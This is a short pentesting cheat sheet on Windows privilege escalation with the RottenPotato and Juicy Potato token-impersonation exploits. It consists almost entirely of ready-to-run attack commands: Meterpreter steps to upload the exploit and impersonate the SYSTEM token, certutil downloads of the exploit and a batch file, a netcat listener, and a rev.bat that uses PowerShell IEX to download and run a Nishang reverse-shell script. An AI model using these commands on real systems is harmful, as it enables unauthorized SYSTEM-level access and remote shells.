rottenpotato.md

RottenPotato

RottenPotato

meterpreter > upload rottenpotato.exe
meterpreter > load incognito
meterpreter > execute -cH -f rottenpotato.exe
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

• https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from...
• https://github.com/breenmachine/RottenPotatoNG

Juicy Potato (abusing the golden privileges)

Cmd > certutil -urlcache -split -f http://127.0.0.1/[3] C:\Windows\System32\spool\drivers\color\j.exe
Cmd > certutil -urlcache -split -f http://127.0.0.1/rev.bat C:\Windows\System32\spool\drivers\color\rev.bat
root@kali:$ nc -lvnp 443
Cmd > j.exe -l 443 -p C:\Windows\System32\spool\drivers\color\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

;= rem rev.bat

cmd /c powershell -NoP IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/[4]')

1. github.com/ohpe/juicy-potato
2. ohpe.it/juicy-potato/CLSID
3. github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
4. github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1